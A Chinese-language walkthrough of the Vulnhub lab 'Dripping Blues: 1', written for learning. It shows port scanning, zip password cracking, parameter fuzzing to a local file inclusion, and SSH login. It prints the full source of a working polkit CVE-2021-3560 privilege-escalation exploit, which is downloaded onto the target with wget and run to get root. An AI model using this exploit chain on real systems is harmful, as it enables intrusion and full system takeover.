Vulnhub之Drippingblues靶机详细测试过程(实现提权)
Drippingblues
作者:jason_huawen
靶机信息
名称:Dripping Blues: 1
地址:
https://www.vulnhub.com/entry/dripping-blues-1,744/
识别目标主机IP地址
──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:e5:b4:f2 1 60 PCS Systemtechnik GmbH
192.168.56.168 08:00:27:16:3d:b8 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.168
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.168 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-12 03:04 EST
Nmap scan report for localhost (192.168.56.168)
Host is up (0.00015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.146
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
| 256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
|_ 256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/dripisreal.txt /etc/dripispowerful.html
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:16:3D:B8 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.72 seconds
NMAP扫描结果表明目标主机有3个开放端口:21(FTP)、22(SSH)、80(HTTP)
获得Shell
21端口
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ ftp 192.168.56.168
Connected to 192.168.56.168.
220 (vsFTPd 3.0.3)
Name (192.168.56.168:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||12988|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Sep 19 2021 .
drwxr-xr-x 2 0 0 4096 Sep 19 2021 ..
-rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip
226 Directory send OK.
ftp> get respectmydrip.zip
local: respectmydrip.zip remote: respectmydrip.zip
229 Entering Extended Passive Mode (|||8960|)
150 Opening BINARY mode data connection for respectmydrip.zip (471 bytes).
100% |********************************************************************************| 471 3.38 KiB/s 00:00 ETA
226 Transfer complete.
471 bytes received in 00:00 (3.37 KiB/s)
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||61132|)
550 Permission denied.
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ searchsploit vsFTPd 3.0.3
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ ls
nmap_full_scan respectmydrip.zip test.txt
-
目标主机允许匿名访问
-
不允许匿名用户上传文件
-
vsFTPd版本3.0.3没有可利用的漏洞
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ unzip respectmydrip.zip
Archive: respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ zip2john respectmydrip.zip > respectmydrip_hash
ver 2.0 respectmydrip.zip/respectmydrip.txt PKZIP Encr: cmplen=32, decmplen=20, crc=5C92F12B ts=96AB cs=5c92 type=0
ver 2.0 respectmydrip.zip/secret.zip is not encrypted, or stored with non-handled compression type
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ unzip respectmydrip.zip
Archive: respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ ls
nmap_full_scan respectmydrip_hash respectmydrip.zip test.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt respectmydrip_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
072528035 (respectmydrip.zip/respectmydrip.txt)
1g 0:00:00:04 DONE (2023-01-12 03:09) 0.2450g/s 3412Kp/s 3412Kc/s 3412KC/s 072551..072046870
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ unzip respectmydrip.zip
Archive: respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password:
extracting: respectmydrip.txt
inflating: secret.zip
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ ls
nmap_full_scan respectmydrip_hash respectmydrip.txt respectmydrip.zip secret.zip test.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ cat respectmydrip.txt
just focus on "drip"
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ unzip secret.zip
Archive: secret.zip
[secret.zip] secret.txt password:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ zip2john secret.zip > secret_hash
ver 2.0 secret.zip/secret.txt PKZIP Encr: cmplen=17, decmplen=12, crc=03D5A50D ts=970A cs=03d5 type=8
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt secret_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 DONE (2023-01-12 03:10) 0g/s 5050Kp/s 5050Kc/s 5050KC/s !LUVDKR!..*7¡Vamos!
Session completed.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt secret_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 DONE (2023-01-12 03:10) 0g/s 5273Kp/s 5273Kc/s 5273KC/s !LUVDKR!..*7¡Vamos!
Session completed.
secret.zip没有破解成功,暂时搁置
80端口
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ curl http://192.168.56.168/
<html>
<body>
driftingblues is hacked again so it's now called drippingblues. :D hahaha
<br>
by
<br>
travisscott & thugger
</body>
</html>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ curl http://192.168.56.168/robots.txt
User-agent: *
Disallow: /dripisreal.txt
Disallow: /etc/dripispowerful.html
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ curl http://192.168.56.168/dripisreal.txt
hello dear hacker wannabe,
go for this lyrics:
https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html
count the n words and put them side by side then md5sum it
ie, hellohellohellohello >> md5sum hellohellohellohello
it's the password of ssh
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ curl http://192.168.56.168/etc/dripispowerful.html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 192.168.56.168 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ curl http://192.168.56.168/../../../../../../etc/dripispowerful.html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 192.168.56.168 Port 80</address>
</body></html>
──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ gobuster dir -u http://192.168.56.168 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.168
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/12 03:21:39 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
Progress: 218879 / 220561 (99.24%)
===============================================================
2023/01/12 03:22:22 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ gobuster dir -u http://192.168.56.168 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.168
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: html,txt,sh,js,php
[+] Timeout: 10s
===============================================================
2023/01/12 03:22:39 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 138]
/.html (Status: 403) [Size: 279]
/robots.txt (Status: 200) [Size: 78]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1322123 / 1323366 (99.91%)
===============================================================
2023/01/12 03:27:39 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ dirb http://192.168.56.168
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jan 12 03:28:15 2023
URL_BASE: http://192.168.56.168/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.168/ ----
+ http://192.168.56.168/index.php (CODE:200|SIZE:138)
+ http://192.168.56.168/robots.txt (CODE:200|SIZE:78)
+ http://192.168.56.168/server-status (CODE:403|SIZE:279)
-----------------
END_TIME: Thu Jan 12 03:28:17 2023
DOWNLOADED: 4612 - FOUND: 3
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ gobuster dir -u http://192.168.56.168 -w /usr/share/seclists/Discovery/Web-Content/ -x .php,.html,.txt,.sh,.js
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ gobuster dir -u http://192.168.56.168 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.168
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,html,txt,sh,js
[+] Timeout: 10s
===============================================================
2023/01/12 03:28:39 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 138]
/robots.txt (Status: 200) [Size: 78]
/server-status (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
Progress: 135205 / 373710 (36.18%)[ERROR] 2023/01/12 03:29:07 [!] parse "http://192.168.56.168/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2023/01/12 03:29:07 [!] parse "http://192.168.56.168/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2023/01/12 03:29:07 [!] parse "http://192.168.56.168/besalu\t.txt": net/url: invalid control character in URL
[ERROR] 2023/01/12 03:29:07 [!] parse "http://192.168.56.168/besalu\t.sh": net/url: invalid control character in URL
[ERROR] 2023/01/12 03:29:07 [!] parse "http://192.168.56.168/besalu\t.js": net/url: invalid control character in URL
Progress: 143764 / 373710 (38.47%)[ERROR] 2023/01/12 03:29:09 [!] parse "http://192.168.56.168/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2023/01/12 03:29:09 [!] parse "http://192.168.56.168/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2023/01/12 03:29:09 [!] parse "http://192.168.56.168/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2023/01/12 03:29:09 [!] parse "http://192.168.56.168/error\x1f_log.txt": net/url: invalid control character in URL
[ERROR] 2023/01/12 03:29:09 [!] parse "http://192.168.56.168/error\x1f_log.sh": net/url: invalid control character in URL
[ERROR] 2023/01/12 03:29:09 [!] parse "http://192.168.56.168/error\x1f_log.js": net/url: invalid control character in URL
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 138]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
Progress: 372745 / 373710 (99.74%)
===============================================================
2023/01/12 03:30:05 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ gobuster dir -u http://192.168.56.168 -w /usr/share/seclists/Discovery/Web-Content/ -x .php,.html,.txt,.sh,.js
Completing file
AdobeCQ-AEM.txt local-ports.txt
AdobeXML.fuzz.txt Logins.fuzz.txt
aem2.txt LotusNotes.fuzz.txt
Apache.fuzz.txt netware.txt
ApacheTomcat.fuzz.txt nginx.txt
apache.txt oauth-oidc-scopes.txt
api/ Oracle9i.fuzz.txt
axis.txt OracleAppServer.fuzz.txt
big.txt Oracle-EBS-wordlist.txt
burp-parameter-names.txt oracle.txt
BurpSuite-ParamMiner/ Passwords.fuzz.txt
CGI-HTTP-POST.fuzz.txt PHP.fuzz.txt
CGI-HTTP-POST-Windows.fuzz.txt proxy-conf.fuzz.txt
CGI-Microsoft.fuzz.txt Public-Source-Repo-Issues.json
CGIs.txt quickhits.txt
CGI-XPlatform.fuzz.txt raft-large-directories-lowercase.txt
CMS/ raft-large-directories.txt
coldfusion.txt raft-large-extensions-lowercase.txt
combined_directories.txt raft-large-extensions.txt
combined_words.txt raft-large-files-lowercase.txt
common-and-dutch.txt raft-large-files.txt
common-and-french.txt raft-large-words-lowercase.txt
common-and-italian.txt raft-large-words.txt
common-and-portuguese.txt raft-medium-directories-lowercase.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ gobuster dir -u http://192.168.56.168 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.168
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,html,txt,sh,js
[+] Timeout: 10s
===============================================================
2023/01/12 03:30:50 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.html (Status: 403) [Size: 279]
/.htaccess.js (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htaccess.txt (Status: 403) [Size: 279]
/.htaccess.sh (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htpasswd.js (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htpasswd.sh (Status: 403) [Size: 279]
/.htpasswd.html (Status: 403) [Size: 279]
/.htpasswd.txt (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 138]
/robots.txt (Status: 200) [Size: 78]
/robots.txt (Status: 200) [Size: 78]
/server-status (Status: 403) [Size: 279]
Progress: 121654 / 122862 (99.02%)
===============================================================
2023/01/12 03:31:15 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ gobuster dir -u http://192.168.56.168 -w /usr/share/seclists/Web-Shells/backdoor_list.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.168
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Web-Shells/backdoor_list.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: html,txt,sh,js,php
[+] Timeout: 10s
===============================================================
2023/01/12 03:31:33 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 138]
/index.php (Status: 200) [Size: 138]
/index.php (Status: 200) [Size: 138]
===============================================================
2023/01/12 03:31:34 Finished
===============================================================
还是回过头来看/robots.txt所提示的,其中一个文件/etc/dripispowerful.html,直接访问该文件,返回不存在,需要FUZZ一下参数
──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ wfuzz -c -u http://192.168.56.168/?FUZZ=/etc/dripispowerful.html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 21
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.168/?FUZZ=/etc/dripispowerful.html
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000172073: 200 40 L 68 W 590 Ch "drip"
Total time: 284.1401
Processed Requests: 220560
Filtered Requests: 220559
Requests/sec.: 776.2367
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ curl http://192.168.56.168/?drip=/etc/dripispowerful.html
<!DOCTYPE html>
<html>
<body>
<style>
body {
background-image: url('drippin.jpg');
background-repeat: no-repeat;
}
@font-face {
font-family: Segoe;
src: url('segoeui.ttf');
}
.mainfo {
text-align: center;
border: 1px solid #000000;
font-family: 'Segoe';
padding: 5px;
background-color: #ffffff;
margin-top: 300px;
}
.emoji {
width: 32px;
}
</style>
password is:
imdrippinbiatch
</body>
</html>
<html>
<body>
driftingblues is hacked again so it's now called drippingblues. :D hahaha
<br>
by
<br>
travisscott & thugger
</body>
</html>
得到密码,那么用户名是什么呢?是不是travisscott,或者thugger
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ ssh travisscott@192.168.56.168
The authenticity of host '192.168.56.168 (192.168.56.168)' can't be established.
ED25519 key fingerprint is SHA256:eVoGERVw0lG6hbny1KztaN+fD1oHC/zhGfuexoATqME.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.168' (ED25519) to the list of known hosts.
travisscott@192.168.56.168's password:
Permission denied, please try again.
travisscott@192.168.56.168's password:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ ssh thugger@192.168.56.168
thugger@192.168.56.168's password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.11.0-34-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
495 updates can be installed immediately.
233 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2025.
thugger@drippingblues:~$ id
uid=1001(thugger) gid=1001(thugger) groups=1001(thugger)
thugger@drippingblues:~$
经过尝试成功登陆ssh
thugger@drippingblues:~$ cat user.txt
5C50FC503A2ABE93B4C5EE3425496521thugger@drippingblues:~$ cat .bash_history
su root
thugger@drippingblues:~$ sudo -l
[sudo] password for thugger:
Sorry, try again.
[sudo] password for thugger:
Sorry, user thugger may not run sudo on drippingblues.
thugger@drippingblues:~$ cd Desktop/
thugger@drippingblues:~/Desktop$ ls -alh
total 8,0K
drwxr-xr-x 2 thugger thugger 4,0K Eyl 18 2021 .
drwxr-xr-x 14 thugger thugger 4,0K Eyl 19 2021 ..
thugger@drippingblues:~/Desktop$ cd ..
thugger@drippingblues:~$ cd Documents/
thugger@drippingblues:~/Documents$ ls -lha
total 8,0K
drwxr-xr-x 2 thugger thugger 4,0K Eyl 18 2021 .
drwxr-xr-x 14 thugger thugger 4,0K Eyl 19 2021 ..
thugger@drippingblues:~/Documents$ cd ..
thugger@drippingblues:~$ cd Pictures/
thugger@drippingblues:~/Pictures$ ls -lha
total 8,0K
drwxr-xr-x 2 thugger thugger 4,0K Eyl 18 2021 .
drwxr-xr-x 14 thugger thugger 4,0K Eyl 19 2021 ..
thugger@drippingblues:~/Pictures$ cd ..
thugger@drippingblues:~$ cd Public/
thugger@drippingblues:~/Public$ ls
thugger@drippingblues:~/Public$ cd /home
thugger@drippingblues:/home$ ls -alh
total 12K
drwxr-xr-x 3 root root 4,0K Eyl 18 2021 .
drwxr-xr-x 21 root root 4,0K Eyl 19 2021 ..
drwxr-xr-x 14 thugger thugger 4,0K Eyl 19 2021 thugger
thugger@drippingblues:/home$ cd /tmp
thugger@drippingblues:/tmp$
提权
查看进程:
root 550 0.0 0.2 238996 11560 ? Ssl 06:32 0:00 /usr/lib/policykit-1/polkitd --no-debug
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ git clone https://github.com/Almorabea/Polkit-exploit.git
Cloning into 'Polkit-exploit'...
remote: Enumerating objects: 31, done.
remote: Counting objects: 100% (31/31), done.
remote: Compressing objects: 100% (30/30), done.
remote: Total 31 (delta 12), reused 2 (delta 0), pack-reused 0
Receiving objects: 100% (31/31), 6.32 MiB | 2.91 MiB/s, done.
Resolving deltas: 100% (12/12), done.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ ls
linpeas.sh Polkit-exploit respectmydrip.txt secret_hash test.txt
nmap_full_scan respectmydrip_hash respectmydrip.zip secret.zip
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ cd Polkit-exploit
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues/Polkit-exploit]
└─$ ls
CVE-2021-3560-Auth-On.gif CVE-2021-3560.py CVE-2021-3560-Root.gif README.md
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues/Polkit-exploit]
└─$ cat CVE-2021-3560.py
import os
import sys
import time
import subprocess
import random
import pwd
print ("**************")
print("Exploit: Privilege escalation with polkit - CVE-2021-3560")
print("Exploit code written by Ahmad Almorabea @almorabea")
print("Original exploit author: Kevin Backhouse ")
print("For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/")
print ("**************")
print("[+] Starting the Exploit ")
time.sleep(3)
check = True
counter = 0
while check:
counter = counter +1
process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply','/org/freedesktop/Accounts','org.freedesktop.Accounts.CreateUser','string:ahmed','string:"Ahmad Almorabea','int32:1'])
try:
#print('1 - Running in process', process.pid)
Random = random.uniform(0.006,0.009)
process.wait(timeout=Random)
process.kill()
except subprocess.TimeoutExpired:
#print('Timed out - killing', process.pid)
process.kill()
user = subprocess.run(['id', 'ahmed'], stdout=subprocess.PIPE).stdout.decode('utf-8')
if user.find("uid") != -1:
print("[+] User Created with the name of ahmed")
print("[+] Timed out at: "+str(Random))
check =False
break
if counter > 2000:
print("[-] Couldn't add the user, try again it may work")
sys.exit(0)
for i in range(200):
#print(i)
uid = "/org/freedesktop/Accounts/User"+str(pwd.getpwnam('ahmed').pw_uid)
#In case you need to put a password un-comment the code below and put your password after string:yourpassword'
password = "string:"
#res = subprocess.run(['openssl', 'passwd','-5',password], stdout=subprocess.PIPE).stdout.decode('utf-8')
#password = f"string:{res.rstrip()}"
process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply',uid,'org.freedesktop.Accounts.User.SetPassword',password,'string:GoldenEye'])
try:
#print('1 - Running in process', process.pid)
Random = random.uniform(0.006,0.009)
process.wait(timeout=Random)
process.kill()
except subprocess.TimeoutExpired:
#print('Timed out - killing', process.pid)
process.kill()
print("[+] Timed out at: " + str(Random))
print("[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root ")
p = subprocess.call("(su ahmed -c 'sudo su')", shell=True)
将polkit漏洞利用脚本上传至目标主机,并执行
thugger@drippingblues:/tmp$ wget http://192.168.56.146:8000/CVE-2021-3560.py
--2023-01-12 12:03:42-- http://192.168.56.146:8000/CVE-2021-3560.py
Connecting to 192.168.56.146:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2434 (2,4K) [text/x-python]
Saving to: ‘CVE-2021-3560.py’
CVE-2021-3560.py 100%[=====================================================>] 2,38K --.-KB/s in 0s
2023-01-12 12:03:42 (43,8 MB/s) - ‘CVE-2021-3560.py’ saved [2434/2434]
thugger@drippingblues:/tmp$ ls
CVE-2021-3560.py
systemd-private-cb6b39dbd2034afa8ee4a75fa2ee2a1d-apache2.service-9b2kuf
systemd-private-cb6b39dbd2034afa8ee4a75fa2ee2a1d-colord.service-8OMh5i
systemd-private-cb6b39dbd2034afa8ee4a75fa2ee2a1d-ModemManager.service-jiQIFh
systemd-private-cb6b39dbd2034afa8ee4a75fa2ee2a1d-switcheroo-control.service-0Suhsg
systemd-private-cb6b39dbd2034afa8ee4a75fa2ee2a1d-systemd-logind.service-8PS3Se
systemd-private-cb6b39dbd2034afa8ee4a75fa2ee2a1d-systemd-resolved.service-5sqh4h
systemd-private-cb6b39dbd2034afa8ee4a75fa2ee2a1d-systemd-timesyncd.service-jfou0f
systemd-private-cb6b39dbd2034afa8ee4a75fa2ee2a1d-upower.service-mVOjRe
tracker-extract-files.1001
tracker-extract-files.125
VMwareDnD
thugger@drippingblues:/tmp$ which python3
/usr/bin/python3
thugger@drippingblues:/tmp$ python3 CVE-2021-3560.py
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse
For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
**************
[+] Starting the Exploit
id: ‘ahmed’: no such user
[+] User Created with the name of ahmed
[+] Timed out at: 0.00862632954385928
Error org.freedesktop.DBus.Error.UnknownMethod: No such interface “org.freedesktop.Accounts.User” on object at path /org/freedesktop/Accounts/User1000
Error org.freedesktop.DBus.Error.UnknownMethod: No such interface “org.freedesktop.Accounts.User” on object at path /org/freedesktop/Accounts/User1000
Error org.freedesktop.DBus.Error.UnknownMethod: No such interface “org.freedesktop.Accounts.User” on object at path /org/freedesktop/Accounts/User1000
[+] Timed out at: 0.008491884830672744
[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root
bash: cannot set terminal process group (35211): Inappropriate ioctl for device
bash: no job control in this shell
root@drippingblues:/tmp# cd /root
root@drippingblues:~# ls -alh
total 24K
drwx------ 4 root root 4,0K Eyl 19 2021 .
drwxr-xr-x 21 root root 4,0K Eyl 19 2021 ..
-rw------- 1 root root 382 Eyl 19 2021 .bash_history
drwx------ 2 root root 4,0K Nis 23 2020 .cache
-r-x------ 1 root root 32 Eyl 19 2021 root.txt
drwx------ 2 root root 4,0K Eyl 19 2021 .ssh
root@drippingblues:~# cat root.txt
78CE377EF7F10FF0EDCA63DD60EE63B8root@drippingblues:~#
经验教训
1.从/robots.txt文件中得到/etc/dripispowerful.html第一直觉有本地文件包含漏洞,但是只是更换文件名称进行尝试,没有坚决的去FUZZ一下参数。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
